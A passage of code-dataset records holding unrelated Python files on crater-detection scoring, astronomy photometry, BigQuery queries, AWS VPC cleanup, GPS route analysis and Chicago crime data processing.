(n_true, n_pred_all, n_pred_correct):\n Number of true craters\n Number of total predicted craters\n Number of correctly predicted craters\n\n \"\"\"\n val_numbers = []\n\n for y_true_p, y_pred_p, match_p in zip(y_true, y_pred, matches):\n n_true = len(y_true_p)\n n_pred = len(y_pred_p)\n\n _, _, ious = match_p\n p = (ious >= iou_threshold).sum()\n\n val_numbers.append((n_true, n_pred, p))\n\n n_true, n_pred_all, n_pred_correct = np.array(val_numbers).sum(axis=0)\n\n return n_true, n_pred_all, n_pred_correct\n\n\ndef _locate_matches(y_true, y_pred, matches, iou_threshold=0.5):\n \"\"\"\n Given list of list of matching craters, return contiguous array of all\n craters x, y, r.\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n\n Returns\n -------\n loc_true, loc_pred\n Each is 2D array (n_patches, 3) with x, y, r columns\n\n \"\"\"\n loc_true = []\n loc_pred = []\n\n for y_true_p, y_pred_p, matches_p in zip(y_true, y_pred, matches):\n\n for idx_true, idx_pred, iou_val in zip(*matches_p):\n if iou_val >= iou_threshold:\n loc_true.append(y_true_p[idx_true])\n loc_pred.append(y_pred_p[idx_pred])\n\n if loc_true:\n return np.array(loc_true), 
np.array(loc_pred)\n else:\n return np.empty((0, 3)), np.empty((0, 3))\n\n\ndef precision(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Precision score (fraction of correct predictions).\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n precision_score : float [0 - 1]\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n n_true, n_pred_all, n_pred_correct = _count_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n return n_pred_correct / n_pred_all\n\n\ndef recall(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Recall score (fraction of true objects that are predicted).\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n recall_score : float [0 - 1]\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n n_true, n_pred_all, n_pred_correct = _count_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n return n_pred_correct / n_true\n\n\ndef mad_radius(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Relative Mean absolute deviation (MAD) of the radius.\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n mad_radius : float > 0\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n loc_true, loc_pred = _locate_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n return np.abs((loc_pred[:, 2] - loc_true[:, 2]) / loc_true[:, 2]).mean()\n\n\ndef mad_center(y_true, y_pred, matches=None, iou_threshold=0.5,\n minipatch=None):\n \"\"\"\n Relative Mean absolute deviation (MAD) of the center (relative to the\n radius of the true object).\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n Threshold to determine match\n\n Returns\n -------\n mad_center : float > 0\n \"\"\"\n if matches is None:\n matches = [_match_tuples(t, p, minipatch=minipatch)\n for t, p in zip(y_true, y_pred)]\n\n loc_true, loc_pred = _locate_matches(\n y_true, y_pred, matches, iou_threshold=iou_threshold)\n\n d = np.sqrt((loc_pred[:, 0] - loc_true[:, 0]) ** 2 + (\n loc_pred[:, 1] - loc_true[:, 1]) ** 2)\n\n return np.abs(d / loc_true[:, 2]).mean()\n\n\n# ScoreType classes\n\n\nclass Precision(DetectionBaseScoreType):\n is_lower_the_better = False\n minimum = 0.0\n maximum = 1.0\n\n def __init__(self, name='precision', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return precision(y_true, y_pred, minipatch=self.minipatch)\n\n\nclass Recall(DetectionBaseScoreType):\n is_lower_the_better = False\n minimum = 0.0\n maximum = 1.0\n\n def __init__(self, name='recall', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n 
self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return recall(y_true, y_pred, minipatch=self.minipatch)\n\n\nclass MAD_Center(DetectionBaseScoreType):\n is_lower_the_better = True\n minimum = 0.0\n maximum = np.inf\n\n def __init__(self, name='mad_center', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return mad_center(y_true, y_pred, minipatch=self.minipatch)\n\n\nclass MAD_Radius(DetectionBaseScoreType):\n is_lower_the_better = True\n minimum = 0.0\n maximum = np.inf\n\n def __init__(self, name='mad_radius', precision=2, conf_threshold=0.5,\n minipatch=None):\n self.name = name\n self.precision = precision\n self.conf_threshold = conf_threshold\n self.minipatch = minipatch\n\n def detection_score(self, y_true, y_pred):\n return mad_radius(y_true, y_pred, minipatch=self.minipatch)\n","sub_path":"workflow/scores/precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
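A toy check of the matching pipeline in the record above, assuming (x, y, r) circle tuples and the package-relative cc_iou import; the numbers are illustrative only:
y_true = [[(10.0, 10.0, 5.0), (40.0, 40.0, 6.0)]]  # one patch with two true circles
y_pred = [[(10.5, 10.0, 5.0)]]                     # one near-perfect prediction

matches = [_match_tuples(t, p) for t, p in zip(y_true, y_pred)]
print(precision(y_true, y_pred, matches=matches))  # 1.0: the single prediction clears IOU 0.5
print(recall(y_true, y_pred, matches=matches))     # 0.5: one of the two true circles is found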
+{"seq_id":"620939809","text":"#!/usr/bin/python3\n\nimport socket\n\nnumero_port_serveur = 80 # identique à celui du client\nadresse_serveur = socket.gethostbyname('www.unilim.fr')\nma_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # ou AF_INET6\nma_socket.connect((adresse_serveur,numero_port_serveur))\nrequete = b\"GET / HTTP/1.0\\r\\nHost: www.unilim.fr\\r\\n\\r\\n\"\n\nma_socket.sendall(requete)\n\nwhile 1:\n ligne = ma_socket.recv(1000)\n if not ligne:\n break\n print(ligne)\nma_socket.close()\n","sub_path":"exo9.py","file_name":"exo9.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402466992","text":"\n\n#Query C On average which URL produced the best story in 2010?\n\nfrom google.cloud import bigquery\nimport webapp2\nimport uuid\nimport time\n\n#class\nclass scoreAvg(webapp2.RequestHandler):\n def get(self):\n rs = self.get_result()\n text = \"\"\"\n \n url Avg_score TIME_STAMP \n \"\"\"\n for i in xrange(len(rs)):\n text += ''\n text += '%s ' % rs[i][0]\n text += '%d ' % rs[i][1]\n text += '%s ' % rs[i][2]\n text += ' '\n text += '
'\n self.response.write(text)\n# async wating\n def __wait_for_job(self, job):\n while True:\n job.reload() # Refreshes the state via a GET request.\n if job.state == 'DONE':\n if job.error_result:\n raise RuntimeError(job.errors)\n return\n time.sleep(1) \n\n def get_result(self):\n sql = \"\"\" SELECT \n url,\n avg(score) as avg_score, \n time_ts as TIME_STAMP \n FROM `bigquery-public-data.hacker_news.stories`\n where EXTRACT(YEAR from time_ts) = 2015\n GROUP BY url, TIME_STAMP \n ORDER BY avg_score DESC\n Limit 5\n \"\"\"\n client = bigquery.Client('extreme-core-158121')\n job = client.run_async_query(str(uuid.uuid4()), sql)\n ds = client.dataset('results')\n if not ds.exists():\n ds.create()\n ds.reload()\n\n tbl = ds.table('table_c')\n #tbl.reload()\n job.destination = tbl \n job.use_legacy_sql = False\n\n job.begin()\n self.__wait_for_job(job)\n\n\n # Drain the query results by requesting a page at a time.\n query_results = job.results()\n page_token = None\n rs = []\n while True:\n rows, total_rows, page_token = query_results.fetch_data(\n max_results=500,\n page_token=page_token)\n\n rs += rows\n\n if not page_token:\n break\n return rs\n","sub_path":"url_avg.py","file_name":"url_avg.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"609928836","text":"from ftw.testbrowser import browsing\nfrom opengever.testing import IntegrationTestCase\n\n\nclass TestRepositoryAPI(IntegrationTestCase):\n\n @browsing\n def test_can_get_repository_root(self, browser):\n self.login(self.regular_user, browser=browser)\n browser.open(self.repository_root, method=\"GET\", headers={\"Accept\": \"application/json\"})\n self.assertEqual(200, browser.status_code)\n expected_repository_root = {\n u'@components': {\n u'actions': {u'@id': u'http://nohost/plone/ordnungssystem/@actions'},\n u'breadcrumbs': {u'@id': u'http://nohost/plone/ordnungssystem/@breadcrumbs'},\n u'navigation': {u'@id': u'http://nohost/plone/ordnungssystem/@navigation'},\n u'types': {u'@id': u'http://nohost/plone/ordnungssystem/@types'},\n u'workflow': {u'@id': u'http://nohost/plone/ordnungssystem/@workflow'},\n },\n u'@id': u'http://nohost/plone/ordnungssystem',\n u'@type': u'opengever.repository.repositoryroot',\n u'UID': u'createrepositorytree000000000001',\n u'allow_discussion': False,\n u'created': u'2016-08-31T07:01:33+00:00',\n u'id': u'ordnungssystem',\n u'is_folderish': True,\n u'items': [\n {\n u'@id': u'http://nohost/plone/ordnungssystem/fuhrung',\n u'@type': u'opengever.repository.repositoryfolder',\n u'description': u'Alles zum Thema F\\xfchrung.',\n u'review_state': u'repositoryfolder-state-active',\n u'title': None,\n },\n {\n u'@id': u'http://nohost/plone/ordnungssystem/rechnungsprufungskommission',\n u'@type': u'opengever.repository.repositoryfolder',\n u'description': u'',\n u'review_state': u'repositoryfolder-state-active',\n u'title': None,\n },\n {\n u'@id': u'http://nohost/plone/ordnungssystem/spinnannetzregistrar',\n u'@type': u'opengever.repository.repositoryfolder',\n u'description': u'',\n u'review_state': u'repositoryfolder-state-inactive',\n u'title': None,\n },\n ],\n u'items_total': 3,\n u'layout': u'tabbed_view',\n u'modified': u'2016-08-31T07:11:33+00:00',\n u'parent': {\n u'@id': u'http://nohost/plone',\n u'@type': u'Plone Site',\n u'description': u'',\n u'title': u'Plone site',\n },\n u'relative_path': u'ordnungssystem',\n u'review_state': u'repositoryroot-state-active',\n u'title_de': u'Ordnungssystem',\n u'title_fr': u'Syst\\xe8me de classement',\n u'valid_from': None,\n u'valid_until': None,\n u'version': None,\n }\n self.assert_json_structure_equal(expected_repository_root, browser.json)\n","sub_path":"opengever/api/tests/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"239148455","text":"def calc_price(values):\n assert type(values) == list\n if len(values) > 0:\n assert 0 <= min(values) and max(values) <= 100 * 10000\n return int(sum(values) * 1.10 + 0.5)\n\n\nif __name__ == '__main__':\n while True:\n try:\n values = list(map(int, input().split(',')))\n print(calc_price(values))\n except EOFError:\n break","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"44290528","text":"import sys\n\nimport pandas as pd\nimport datetime\n\nfrom matplotlib import ticker\nfrom shapely.geometry import Point\nimport matplotlib.pyplot as plt\n\npoints = [(50.52941, 14.0719), (50.52927, 14.0722)]\n\ndef toCartesian(latitude, longitude):\n x = longitude * 70_800\n y = latitude * 111_300\n return Point(x, y)\n\n\ndef get_path(pathdata, starttime, endtime):\n return pathdata[(starttime <= pathdata[\"timestamp_m\"]) & (pathdata[\"timestamp_m\"] <= endtime)]\n\n\ndef minimal_distance(path, lat, long):\n p = toCartesian(lat, long)\n minimal = path.apply(lambda x: toCartesian(x[\"locLat\"], x[\"locLon\"]).distance(p),\n axis=1)\n return minimal.min(), minimal.idxmin()\n\nroutes = pd.read_csv(\"data/localized_routes_01.csv\")\npathdata = pd.read_csv(\"data/01_2021-02-25.csv\",\n index_col=\"beat\",\n converters={\n \"beat\": lambda x: int(float(x)),\n \"timestamp_m\": lambda x: int(float(x))})\npathdata2 = pd.read_csv(\"data/01_2021-03-16.csv\",\n index_col=\"beat\",\n converters={\n \"beat\": lambda x: int(float(x)),\n \"timestamp_m\": lambda x: int(float(x))})\npathdata = pathdata.append(pathdata2)\nroutes[\"date\"] = pd.to_datetime(routes[\"beat\"], unit=\"s\")\nroutes = routes[(datetime.datetime(2021,2,25) <= routes[\"date\"])\n & (routes[\"date\"] <= datetime.datetime(2021,2,26))\n |\n (datetime.datetime(2021, 3, 16) <= routes[\"date\"])\n & (routes[\"date\"] <= datetime.datetime(2021, 3, 17))]\nprint(routes)\n\np1_dist = []\np2_dist = []\nstart_beat = []\np1_beat = []\np2_beat = []\nend_beat = []\nt1_longs = []\nt1_lats = []\nt1_plongs = []\nt1_plats = []\nt2_longs = []\nt2_lats = []\nt2_plongs = []\nt2_plats = []\nt3_longs = []\nt3_lats = []\nt3_plongs = []\nt3_plats = []\nresults = []\n\n\nfor index, route in routes.iterrows():\n starttime = route[\"beat\"]\n endtime = route[\"end_beat\"]\n path = get_path(pathdata, starttime * 1000, endtime * 1000)\n if len(path) == 0:\n continue\n start_beat.append(path.index[0])\n end_beat.append(path.index[-1])\n dist1, idx1 = minimal_distance(path, *points[0])\n p1_dist.append(dist1)\n p1_beat.append(idx1)\n dist2, idx2 = minimal_distance(path, *points[1])\n p2_dist.append(dist2)\n p2_beat.append(idx2)\n if dist1 < 7.0:\n if route[\"locLon_end\"] > 14.0726 and route[\"locLat_end\"] > 50.5291:\n t1_plats.extend(path[\"locLat\"])\n t1_plongs.extend(path[\"locLon\"])\n t1_lats.append(route[\"locLat_end\"])\n t1_longs.append(route[\"locLon_end\"])\n results.append(0)\n elif route[\"locLon_end\"] > 14.07265:\n t3_plats.extend(path[\"locLat\"])\n t3_plongs.extend(path[\"locLon\"])\n t3_lats.append(route[\"locLat_end\"])\n t3_longs.append(route[\"locLon_end\"])\n results.append(2)\n else:\n t2_plats.extend(path[\"locLat\"])\n t2_plongs.extend(path[\"locLon\"])\n t2_lats.append(route[\"locLat_end\"])\n t2_longs.append(route[\"locLon_end\"])\n results.append(1)\n else:\n results.append(-1)\n\nplt.scatter(t2_plongs, t2_plats, c=\"#9999FF\", s=1)\nplt.scatter(t1_plongs, t1_plats, c=\"#99FF99\", s=1)\nplt.scatter(t3_plongs, t3_plats, c=\"#FF9999\", s=1)\nplt.scatter(t1_longs, t1_lats, c=\"#00AA00\")\nplt.scatter(t2_longs, t2_lats, c=\"#0000AA\")\nplt.scatter(t3_longs, t3_lats, c=\"#AA0000\")\nplt.scatter([points[0][1]], [points[0][0]], s=5, c=\"k\")\n#plt.scatter([points[1][1]], [points[1][0]], c=\"r\")\nplt.gca().xaxis.set_minor_locator(ticker.MultipleLocator(0.0001))\nplt.gca().yaxis.set_minor_locator(ticker.MultipleLocator(0.0001))\nplt.grid(True, which=\"both\")\nplt.show()\nroutes[\"p1_minimal_dist\"] = 
p1_dist\nroutes[\"p2_minimal_dist\"] = p2_dist\nroutes[\"start_pbeat\"] = start_beat\nroutes[\"p1_pbeat\"] = p1_beat\nroutes[\"p2_pbeat\"] = p2_beat\nroutes[\"end_pbeat\"] = end_beat\nroutes[\"target\"] = results\n\nroutes.to_csv(\"data/routes_pdist_brezen_01.csv\")\n","sub_path":"lastmeters.py","file_name":"lastmeters.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"271777004","text":"#!/usr/bin/python3\nimport boto3\nimport argparse\n\n# defining resources\nec2 = boto3.resource('ec2')\nclient = boto3.client('ec2')\n\nvpc_id = client.describe_vpcs()['Vpcs'][0]['VpcId']\nvpc = ec2.Vpc(vpc_id)\n\nif len(client.describe_internet_gateways()['InternetGateways']) > 0:\n vpc_id = client.describe_internet_gateways()['InternetGateways'][0]['Attachments'][0]['VpcId']\n internet_gateway_id = client.describe_internet_gateways()['InternetGateways'][0]['InternetGatewayId']\n vpc = ec2.Vpc(vpc_id)\n vpc.detach_internet_gateway(InternetGatewayId=internet_gateway_id)\n client.delete_internet_gateway(InternetGatewayId=internet_gateway_id)\n\nclient.delete_vpc(VpcId=vpc_id)\ndhcp_options_id = client.describe_dhcp_options()['DhcpOptions'][0]['DhcpOptionsId']\nclient.delete_dhcp_options(DhcpOptionsId=dhcp_options_id)\n","sub_path":"boto3/session1/ariel_way/delete_vpc.py","file_name":"delete_vpc.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"651899018","text":"#!/usr/bin/env python\nfrom photutils import centroid_com, centroid_1dg, centroid_2dg\nfrom photutils import CircularAperture\nfrom photutils import CircularAnnulus\nfrom photutils import aperture_photometry\nimport numpy as np\nfrom tqdm import tqdm\ntry:\n from astropy.io import fits\nexcept:\n import pyfits as fits\nfrom datetime import datetime as dt\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy.optimize import curve_fit\n\nfrom photutils import DAOStarFinder\nfrom astropy.stats import sigma_clipped_stats\nfrom astropy.visualization import ZScaleInterval\n\ndef get_sources(img, num_stars=10, fwhm=8.0):\n mean, median, std = sigma_clipped_stats(img, sigma=3.0, iters=5)\n daofind = DAOStarFinder(fwhm=fwhm, threshold=5.*std)\n sources = daofind(img - median)\n #convert to pandas dataframe for easy sorting\n sources = sources.to_pandas()\n #sort by brightness\n sources = sources.sort_values(by='peak',ascending=False)\n\n return sources.head(num_stars)\n\ndef show_sources(image, sources, num_stars=10):\n '''\n similar to `show_peaks`; difference is `sources` used as input\n '''\n positions = (sources['xcentroid'].values[:num_stars], sources['ycentroid'].values[:num_stars])\n apertures = CircularAperture(positions, r=20.)\n vmin,vmax= ZScaleInterval().get_limits(image)\n plt.figure(figsize=(10,10))\n plt.imshow(image, origin='lower', vmin=vmin,vmax=vmax)\n for num, (x,y) in enumerate(zip(positions[0],positions[1])):\n plt.text(x+5,y+5, num+1, fontsize=20, color='w')\n\n apertures.plot(color='r', lw=2)\n #return None\n plt.show()\n\ndef get_crop(image, centroid, box_size):\n x, y = centroid\n image_crop = np.copy(image[int(y-(box_size/2)):int(y+(box_size/2)),int(x-(box_size/2)):int(x+(box_size/2))])\n\n return image_crop\n\ndef get_centroid(image, method='com'):\n '''\n centroid_com(): Calculates the object “center of mass” from 2D image moments.\n centroid_1dg(): Calculates the centroid by fitting 1D Gaussians to the marginal x and y distributions of the data.\n centroid_2dg(): Calculates the centroid by fitting a 2D Gaussian to the 2D distribution of the data.\n Default is com.\n '''\n if method=='com':\n x, y = centroid_com(image)\n return (x,y)\n\n elif method=='1d_gaussian':\n x, y = centroid_1dg(image)\n return (x,y)\n elif method=='2d_gaussian':\n #bug: takes too much time; fit may be unsuccessful\n x, y = centroid_2dg(image)\n return (x,y)\n else:\n print('invalid centroiding algorithm')\n sys.exit()\n\n\ndef get_phot(image, centroid, r, fwhm = 8.0):\n\n apertures = CircularAperture(centroid, r)\n phot_table = aperture_photometry(image, apertures)\n\n #xcenter = phot_table['xcenter']\n #ycenter = phot_table['ycenter']\n #centroid = (xcenter, ycenter)\n aperture_sum = float(phot_table['aperture_sum'])\n\n return aperture_sum #,centroid\n\ndef get_phot2(image, bkg_mean, centroid, r=10):\n\n apertures = CircularAperture(centroid, r)\n phot_table = aperture_photometry(image - bkg_mean, apertures)\n aperture_sum = float(phot_table['aperture_sum'])\n\n return aperture_sum #,centroid\n\ndef get_multiple_phot(image, centroid, aperture_radii):\n '''\n bug: Cannot convert a table with mixin columns to a pandas DataFrame\n '''\n apertures = [CircularAperture(centroid, r=r) for r in aperture_radii]\n phot_table = aperture_photometry(image, apertures)\n #convert to pandas dataframe\n #phot_table = phot_table.to_pandas()\n return phot_table\n\ndef sigma_per_r(image, centroid, r_in, r_out, delta_r,show_image=True):\n r = 
np.arange(r_in,r_out,delta_r)\n aperture_sums = []\n for i in r:\n aperture_sums.append(get_phot(image, centroid, r=i))\n if show_image==True:\n plt.plot(r,aperture_sums,'o')\n plt.xlabel('aperture radius')\n plt.ylabel('aperture sum')\n return aperture_sums\n\ndef radial_profile(image, center):\n y, x = np.indices((image.shape))\n r = np.sqrt((x - center[0])**2 + (y - center[1])**2)\n r = r.astype(np.int)\n\n tbin = np.bincount(r.ravel(), image.ravel())\n nr = np.bincount(r.ravel())\n radialprofile = tbin / nr\n return radialprofile\n\ndef get_bkg(image, centroid, r_in=10., r_out=20.):\n annulus = CircularAnnulus(centroid, r_in, r_out)\n result = aperture_photometry(image, annulus)\n bkg_mean = float(result['aperture_sum'] / annulus.area())\n return bkg_mean\n\ndfs = []\ndef make_lightcurve(centroids, bands, band_idx, box_size, aperture_radius):\n \"\"\"Creates a lightcurve after doing aperture photometry\n\n Parameters\n ----------\n\n centroids : typle\n (x,y) centroid positions from config.txt\n\n bands: dict\n dictionary of filenames by band/color\n\n band_idx: int\n index for band/color\n\n box_size: int\n size of box for cropping (in pix)\n\n aperture_radius: int\n aperture radius for photometry (in pix)\n \"\"\"\n band_names = np.sort(list(bands.keys()))\n num_stars= range(len(centroids))\n for star_idx in num_stars:\n xcenters, ycenters = [],[]\n aperture_sums = []\n background = []\n fwhms = []\n obs_time = []\n obs_mjd = []\n ##extract lightcurve (enumerate all frames) in a given band\n for i in tqdm(bands[band_names[band_idx]]):\n #import pdb; pdb.set_trace()\n hdr = fits.open(i)[0].header\n img = fits.open(i)[0].data\n #get dates from fits header\n date=dt.strptime(hdr['DATE-OBS'], '%Y-%m-%d')\n time=dt.strptime(hdr['EXP-STRT'], '%H:%M:%S.%f')\n newdate = time.replace(year=date.year, month=date.month, day=date.day)\n obs_time.append(newdate)\n obs_mjd.append(hdr['MJD-STRT'])\n\n #crop\n #import pdb; pdb.set_trace()\n image_crop = get_crop(img, centroids[star_idx], box_size)\n\n ###aperture photometry###\n #compute centroid\n centroid = get_centroid(image_crop)\n\n xcenters.append(centroid[0])\n ycenters.append(centroid[1])\n\n #compute backgound\n bkg_mean=get_bkg(image_crop, centroid, r_in=20., r_out=30.)\n\n #measure fwhm\n fwhm=get_fwhm(image_crop)\n\n #without aperture photometry\n\n aperture_sum = get_phot(image_crop, centroid, r=aperture_radius)\n\n #minus background wihtin annulus\n #aperture_sum = get_phot2(image_crop,bkg_mean,centroid,r=aperture_radius)\n\n aperture_sums.append(aperture_sum)\n background.append(bkg_mean)\n\n # if fwhm < 10*np.median(fwhms):\n # fwhms.append(fwhm)\n # else:\n # fwhms.append(np.nan)\n fwhms.append(fwhm)\n\n #output as dataframe of given band and star\n\n dfs.append(pd.DataFrame(\n {'{0}_{1}_x'.format(band_names[band_idx], str(star_idx)) : xcenters,\n '{0}_{1}_y'.format(band_names[band_idx], str(star_idx)) : ycenters,\n '{0}_{1}_flux_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : aperture_sums,\n '{0}_{1}_bkg_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : background,\n '{0}_{1}_fwhm_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : fwhms},\n #'airmass' : airmass\n index = obs_time))\n return dfs, band_idx, band_names\n\ndef get_fwhm(image_crop):\n # https://python4astronomers.github.io/fitting/sherpa.html\n i,j = np.unravel_index(image_crop.argmax(), image_crop.shape) #take x,y max\n #plt.plot(image_crop[i,:], '-')\n #plt.plot(image_crop[:,j], '--')\n peak_x=image_crop[i,:]\n 
peak_y=image_crop[:,j]\n try:\n sigma=model_gaussian(peak_x, peak_y)\n fwhm=2.355*np.abs(sigma)\n except:\n #no good estimate\n fwhm=np.nan\n\n return fwhm\n\ndef gauss(x, *params):\n A, mu, sigma, eps= params\n return A*np.exp(-(x-mu)**2/(2.*sigma**2)) + eps\n\ndef model_gaussian(peak_x, peak_y,verbose=False):\n #estimate mean and standard deviation\n ydata = (peak_x+peak_y)/2.0\n xdata = np.array(range(len(ydata)))\n xmean = len(xdata)\n sigma = np.std(ydata)\n amp = np.max(ydata)\n eps =0.1\n #fitting\n popt, pcov = curve_fit(gauss, xdata, ydata, p0 = [amp, xmean, sigma, eps])\n\n #plt.plot(xdata,gauss(xdata, *popt), label='Gaussian fit')\n #plt.plot(xdata,ydata,'ok', label='data')\n #plt.legend()\n if verbose==True:\n print('A: {}\\nmu: {}\\nsigma= {}\\neps: {}'.format(popt[0],popt[1], popt[2], popt[3]))\n return popt[2]\n","sub_path":"moscatel/phot.py","file_name":"phot.py","file_ext":"py","file_size_in_byte":8697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"356956347","text":"def compare(current_data_times,current_data_tags,db_data):\r\n#inputs: current_data_times- list of the repititions of the HTML tags of input website\r\n#current_data_tags-list of the HTML tags of input website\r\n#db_data- type list. A table of expected elements and repititions, taken from DB.\r\n#purpose: compares between table from DB to input lists and prints the differences\r\n for line in db_data:\r\n flag=0\r\n ind=0\r\n for tag in current_data_tags:\r\n temp=line[1].split()[0] #clear spaces\r\n if temp==tag:\r\n flag=1\r\n print(str(temp) + \" expected \" + str(line[0]) + \" found \" + str(current_data_times[ind]))\r\n break\r\n ind += 1\r\n if flag==0:\r\n print(str(temp[0])+\" expected \"+str(line[0])+\" found \"+\"0\")\r\n\r\n\r\n\r\n","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"539075589","text":"'''\nPurpose:\n Clean crime dataframe with nearest node information for each\n community area.\n'''\nimport numpy as np\nimport pandas as pd\nimport osmnx as ox\nfrom matplotlib import pyplot as plt\n\npd.options.mode.chained_assignment = None # default='warn'\n\n\ndef get_com_dict(data, com_Gs, community_areas, plot=False):\n '''\n Purpose:\n Construct crime dataframe for each community area. We\n cleaned dataframe to have additional information such\n as nearest node, hour, month, time of day, season. Can\n also generate plots for relevant information for each\n community area.\n Inputs:\n data (Pandas DataFrame): crime data imported from Chicago Data Portal\n com_Gs (dictionary): maps community area to boundary geodataframe.\n community_areas (dictionary): maps community area to community\n code number\n plot (boolean): if True, plot stats, otherwise don't plot\n Outputs:\n com_df (dictionary): creates a dictionary with key as community area\n with crime dataframe\n (ex) com_df = {'HYDE PARK': hyde_park_df, 'DOUGLAS': douglas_df, etc.}\n '''\n com_dict = {}\n seasons_months = {\n 'winter': [12, 1, 2],\n 'spring': [3, 4, 5],\n 'summer': [6, 7, 8],\n 'fall': [9, 10, 11]}\n time_of_day_hours = {\n 'morning': [1, 2, 3, 4, 5, 6, 7, 8],\n 'night': [0, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,\\\n 20, 21, 22, 23]}\n\n for com in community_areas:\n # specific community crimes\n com_crime = data[data['community_area'] == community_areas[com]]\n G = com_Gs[com]\n # Finds the nearest node id:\n com_crime['nearest_node'] = ox.get_nearest_nodes(G,\\\n np.array(com_crime['longitude']), np.array(\\\n com_crime['latitude']), method='kdtree')\n com_crime.drop(columns=['latitude', 'longitude'], inplace=True)\n com_crime['hour'] = com_crime['date'].dt.hour\n com_crime['month'] = com_crime['date'].dt.month\n com_crime['time_of_day'] = np.nan #Fill in values as NaN\n com_crime['season'] = np.nan #Fill in values as NaN\n\n # Following lines of code motivated by:\n # https://stackoverflow.com/questions/16327055/how-to-add-\n # an-empty-column-to-a-dataframe\n for time_of_day, hours in time_of_day_hours.items():\n com_crime.loc[com_crime['hour'].\\\n isin(hours), 'time_of_day'] = time_of_day\n for season, months in seasons_months.items():\n com_crime.loc[com_crime['month'].\\\n isin(months), 'season'] = season\n\n if plot:\n graph_by_time(com_crime, com)\n graph_by_month(com_crime, com)\n graph_by_season(com_crime, com)\n else:\n com_crime = com_crime.drop(columns=['hour', 'month'])\n # If plotting, need these columns to make graphs for\n # entirety of Chicago\n\n com_dict[com] = com_crime\n\n if plot: # Generate graphs for entirety of Chicago\n com_df_merged = pd.concat([com for com in com_dict.values()], axis=0)\n graph_by_time(com_df_merged, 'CHICAGO')\n graph_by_month(com_df_merged, 'CHICAGO')\n graph_by_season(com_df_merged, 'CHICAGO')\n for com, com_crime in com_dict.items():\n com_dict[com] = com_crime.drop(columns=['hour', 'month'])\n\n return com_dict\n\n\ndef graph_by_time(com_crime_df, com_area):\n '''\n Constructs crime frequency over different hours\n '''\n vals = com_crime_df['hour'].value_counts()\n plt.bar(x=vals.index, height=vals)\n plt.xlabel('Time of Day (Hour)')\n plt.ylabel('Total Number of Crimes')\n plt.title('Crime Counts by Time of Day for ' + com_area.title())\n filename = 'data/folium_figures/' + com_area.replace(' ', '_') + '_time.png'\n plt.savefig(filename, bbox_inches='tight')\n plt.clf()\n\n\ndef graph_by_month(com_crime_df, com_area):\n '''\n 
